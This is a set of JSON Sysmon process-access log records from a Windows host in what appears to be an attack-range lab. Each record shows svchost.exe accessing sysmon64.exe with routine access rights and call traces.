{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1570,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1571,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1572,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1573,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1574,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1575,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1576,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1577,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
